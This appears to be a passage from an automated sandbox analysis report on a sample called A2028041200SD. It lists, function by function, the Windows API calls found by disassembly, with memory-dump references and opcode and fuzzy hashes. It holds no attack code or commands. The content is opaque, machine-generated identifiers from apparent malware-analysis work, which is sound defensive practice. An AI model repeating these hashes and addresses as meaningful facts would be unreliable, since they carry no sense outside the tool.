                                                                        • Instruction Fuzzy Hash: 93316830A80248AEEF308B6488197FEFBB99F45321F04811AF481931D1C7748F85DF61
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00924038
                                                                        • __isleadbyte_l.LIBCMT ref: 00924066
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00924094
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009240CA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        • Opcode ID: 6567ce64ed10a2b03bfa768ed95f1328c69b07fa3222076a44cdb8d121cba5e5
                                                                        • Instruction ID: f8c403c02fa9c7b3efd0ced99b70cb067e6feb4761670b3b2ec46be4acf941a8
                                                                        • Opcode Fuzzy Hash: 6567ce64ed10a2b03bfa768ed95f1328c69b07fa3222076a44cdb8d121cba5e5
                                                                        • Instruction Fuzzy Hash: 9731D031644226EFDB21DF74E844BAA7BB9FF40310F154428EA658B1A4E731D8D0DB90
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00957CB9
                                                                          • Part of subcall function 00935F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00935F6F
                                                                          • Part of subcall function 00935F55: GetCurrentThreadId.KERNEL32 ref: 00935F76
                                                                          • Part of subcall function 00935F55: AttachThreadInput.USER32(00000000,?,0093781F), ref: 00935F7D
                                                                        • GetCaretPos.USER32(?), ref: 00957CCA
                                                                        • ClientToScreen.USER32(00000000,?), ref: 00957D03
                                                                        • GetForegroundWindow.USER32 ref: 00957D09
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        • Opcode ID: b535532056966e6190352c712dacec9fff284b92ffb04244651b0ae4dc964959
                                                                        • Instruction ID: e41610b10d93b91ccfadf35ef38b4140994a362eacab4eacc8fe1f3efa0a74d8
                                                                        • Opcode Fuzzy Hash: b535532056966e6190352c712dacec9fff284b92ffb04244651b0ae4dc964959
                                                                        • Instruction Fuzzy Hash: F7311EB2900108AFDB10EFA5D845AEFFBF9EF98314F108466E815E3251DA319E45CFA0
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • GetCursorPos.USER32(?), ref: 0095F211
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0096E4C0,?,?,?,?,?), ref: 0095F226
                                                                        • GetCursorPos.USER32(?), ref: 0095F270
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0096E4C0,?,?,?), ref: 0095F2A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                        • String ID:
                                                                        • API String ID: 2864067406-0
                                                                        • Opcode ID: 4a34427419b7ad57f7cc8d28699b8f64ecdb367563bd0e066747c0b372cda789
                                                                        • Instruction ID: 0e92eee02b80e18259bc0dc8d1c571a54d67d80e6a667dcd87081795b9845de7
                                                                        • Opcode Fuzzy Hash: 4a34427419b7ad57f7cc8d28699b8f64ecdb367563bd0e066747c0b372cda789
                                                                        • Instruction Fuzzy Hash: CC21DD79601018EFCB25CF95C868EEE7BB9EF49321F048069F9094B2A1D3309990EB90
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00944358
                                                                          • Part of subcall function 009443E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00944401
                                                                          • Part of subcall function 009443E2: InternetCloseHandle.WININET(00000000), ref: 0094449E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                        • String ID:
                                                                        • API String ID: 1463438336-0
                                                                        • Opcode ID: a0d3f52d44a75f326167cfb4449dd02c784798488c48ac1da6c7eec2cef1824c
                                                                        • Instruction ID: 954edd8d216d61b12a189f01d513ddfca25cda85051d490097b5b85fb4912aa6
                                                                        • Opcode Fuzzy Hash: a0d3f52d44a75f326167cfb4449dd02c784798488c48ac1da6c7eec2cef1824c
                                                                        • Instruction Fuzzy Hash: E821D176205A05BBEB159F609D00FBBB7ADFF84B10F10401ABA1996650DB719820AB90
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00958AA6
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00958AC0
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00958ACE
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00958ADC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        • Opcode ID: 66013695e8cd876add71b7bb9d65cdab3714d89dddeb773b9372c3773898cd0c
                                                                        • Instruction ID: 81c948999f552e0ccf5f2f66fb62f022460e8eafda86114f17d3b12cb39f3b93
                                                                        • Opcode Fuzzy Hash: 66013695e8cd876add71b7bb9d65cdab3714d89dddeb773b9372c3773898cd0c
                                                                        • Instruction Fuzzy Hash: 7E11D031205115AFEB04AB29CC09FBB77ADFF85321F18411AF91AE72E1CB74AC448B91
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00948AE0
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00948AF2
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00948AFF
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948B16
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: 28907ea9652b53f0ba0f3441d156f258b921aebed544bb09c53fc722a5ed2ded
                                                                        • Instruction ID: dafbb864d5932cf3e35eeeef04d95c01b0fe72416fa944d56a319907405cecd4
                                                                        • Opcode Fuzzy Hash: 28907ea9652b53f0ba0f3441d156f258b921aebed544bb09c53fc722a5ed2ded
                                                                        • Instruction Fuzzy Hash: 70217572A011249FC7159F69CC85E9EBBFCEF49350F0081AAF849E7291DB74DA858F90
                                                                        APIs
                                                                          • Part of subcall function 00931E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00930ABB,?,?,?,0093187A,00000000,000000EF,00000119,?,?), ref: 00931E77
                                                                          • Part of subcall function 00931E68: lstrcpyW.KERNEL32(00000000,?,?,00930ABB,?,?,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00931E9D
                                                                          • Part of subcall function 00931E68: lstrcmpiW.KERNEL32(00000000,?,00930ABB,?,?,?,0093187A,00000000,000000EF,00000119,?,?), ref: 00931ECE
                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00930AD4
                                                                        • lstrcpyW.KERNEL32(00000000,?,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00930AFA
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0093187A,00000000,000000EF,00000119,?,?,00000000), ref: 00930B2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                        • String ID: cdecl
                                                                        • API String ID: 4031866154-3896280584
                                                                        • Opcode ID: 65de8cc097dbc51bbbd8c25819791e4de5accabdd735375b6f731384f7ad4de3
                                                                        • Instruction ID: 238e5e2ed1fb69c10d197e04db2dcb1864c412a7a9286a2676c0851b5d30007f
                                                                        • Opcode Fuzzy Hash: 65de8cc097dbc51bbbd8c25819791e4de5accabdd735375b6f731384f7ad4de3
                                                                        • Instruction Fuzzy Hash: A2119636210305AFDB259F34DC55E7A77B8FF85354F80406AF809CB2A0EB719950DBA0
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00922FB5
                                                                          • Part of subcall function 0091395C: __FF_MSGBANNER.LIBCMT ref: 00913973
                                                                          • Part of subcall function 0091395C: __NMSG_WRITE.LIBCMT ref: 0091397A
                                                                          • Part of subcall function 0091395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,0090F507,?,0000000E), ref: 0091399F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_free
                                                                        • String ID:
                                                                        • API String ID: 614378929-0
                                                                        • Opcode ID: 0b3129238624da17bcb6c68a38a3ba977fc606c41e5a78a82b12babcd070476b
                                                                        • Instruction ID: 3518fe1057f707aaf4f89c4b341d30f52ad626e0729b941015158db28f6a8c1c
                                                                        • Opcode Fuzzy Hash: 0b3129238624da17bcb6c68a38a3ba977fc606c41e5a78a82b12babcd070476b
                                                                        • Instruction Fuzzy Hash: 9A11C132649236BBDB313B70BD057D97B78AF94360F208915F5499A155DB38C9C096D0
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009305AC
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009305C7
                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009305DD
                                                                        • FreeLibrary.KERNEL32(?), ref: 00930632
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                        • String ID:
                                                                        • API String ID: 3137044355-0
                                                                        • Opcode ID: c55adb5e52b36189da3c48e870b732574a22803044373e9508823b0bb963c319
                                                                        • Instruction ID: adb8dbd5e2ccc203f3d23d7143e30fe32f415f3327f24cba11ebfbc087cff564
                                                                        • Opcode Fuzzy Hash: c55adb5e52b36189da3c48e870b732574a22803044373e9508823b0bb963c319
                                                                        • Instruction Fuzzy Hash: 64218172901209EFDB208F91DCAAADBBBBCEFC0708F008969E51A92150D774EA55DF50
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00936733
                                                                        • _memset.LIBCMT ref: 00936754
                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009367A6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 009367AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                        • String ID:
                                                                        • API String ID: 1157408455-0
                                                                        • Opcode ID: e7b17da4bf164b4f5af6823f4cd5b5f8bb849f8e8e83ebf50e9b4ed0d02385a2
                                                                        • Instruction ID: a0e6049630eed60b0fb290f9df4a567fdbe4d7568b51f0ea754c02c79d654d17
                                                                        • Opcode Fuzzy Hash: e7b17da4bf164b4f5af6823f4cd5b5f8bb849f8e8e83ebf50e9b4ed0d02385a2
                                                                        • Instruction Fuzzy Hash: 7711CA769013287AE72057A5AC4DFEFBABCEF44764F10419AF509E71D0D2744E808BA4
                                                                        APIs
                                                                          • Part of subcall function 0092AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0092AA79
                                                                          • Part of subcall function 0092AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0092AA83
                                                                          • Part of subcall function 0092AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0092AA92
                                                                          • Part of subcall function 0092AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0092AA99
                                                                          • Part of subcall function 0092AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092AAAF
                                                                        • GetLengthSid.ADVAPI32(?,00000000,0092ADE4,?,?), ref: 0092B21B
                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0092B227
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092B22E
                                                                        • CopySid.ADVAPI32(?,00000000,?), ref: 0092B247
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                        • String ID:
                                                                        • API String ID: 4217664535-0
                                                                        • Opcode ID: 13faf348c890ed1daff7c17226fb59419cf0c8aa77419b87a7d7fe02b0f822d3
                                                                        • Instruction ID: d753ffc97a5bbd3f5ee9049e9c47fa9c01371f25c2d22ffcbe430e753d28cf67
                                                                        • Opcode Fuzzy Hash: 13faf348c890ed1daff7c17226fb59419cf0c8aa77419b87a7d7fe02b0f822d3
                                                                        • Instruction Fuzzy Hash: BC11CE72A01215EFCB089F98ED84AAEB7FDEF94304F14802DE95697214D731AE84DB10
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0092B498
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4AA
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4C0
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0092B4DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: e4d39f4a4db15416c8f0259f0d666ddc319ad7762c91009c3afaa14244d6cd48
                                                                        • Instruction ID: 16454acc70069531387b1f4c565e8d33011ad33c7ac0313fbd3e5b0d5fee27aa
                                                                        • Opcode Fuzzy Hash: e4d39f4a4db15416c8f0259f0d666ddc319ad7762c91009c3afaa14244d6cd48
                                                                        • Instruction Fuzzy Hash: 2311487A900228FFDB11EFA8D881E9DBBB8FB48710F204091E604B7294D771AE10DB94
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0090B5A5
                                                                        • GetClientRect.USER32(?,?), ref: 0096E69A
                                                                        • GetCursorPos.USER32(?), ref: 0096E6A4
                                                                        • ScreenToClient.USER32(?,?), ref: 0096E6AF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: 66bcb22a2036041d79ce1aaa759c154d0de9dd63afedf6114895cd53821e815f
                                                                        • Instruction ID: 94af0fb709ddd174976a5a7bd0cdea309a9b72a42ce369023d0fa947b1a9a346
                                                                        • Opcode Fuzzy Hash: 66bcb22a2036041d79ce1aaa759c154d0de9dd63afedf6114895cd53821e815f
                                                                        • Instruction Fuzzy Hash: 4A11453690102AFFDB10DF98CD869EE7BB8EF49305F100491F906E7180D334AA81DBA1
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00937352
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00937385
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0093739B
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009373A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 2880819207-0
                                                                        • Opcode ID: 8b7ebe4719b796860cee2bc8cd276eb8959727842200040214afddce271ee2ef
                                                                        • Instruction ID: 518ef3cec383503fcb832f3874a9c186a854bf361515e05b78987c0bebb8caab
                                                                        • Opcode Fuzzy Hash: 8b7ebe4719b796860cee2bc8cd276eb8959727842200040214afddce271ee2ef
                                                                        • Instruction Fuzzy Hash: 8011C4B2A1C204BFD711DBA8EC05A9EBBADAF45324F144355F935E32A1D6708D00ABA1
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                        • GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                        • String ID:
                                                                        • API String ID: 3970641297-0
                                                                        • Opcode ID: 051a8cb4a6cb11729a58d1777e570b92e457271c22784aba132f24a694ff2f1d
                                                                        • Instruction ID: 99e0ffe4afb958eaed1c85cb3101078650a1ddd0b691bac91dcd2bf1e9fca7e8
                                                                        • Opcode Fuzzy Hash: 051a8cb4a6cb11729a58d1777e570b92e457271c22784aba132f24a694ff2f1d
                                                                        • Instruction Fuzzy Hash: 5D11ADB210A509BFEF0A4F909C50EEABB6DFF08364F040102FA1452090CB319CA0EBA0
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 00933FB8
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 00933FDD
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 00933FE7
                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00932B1B,?,00933B9F,?,00008000), ref: 0093401A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
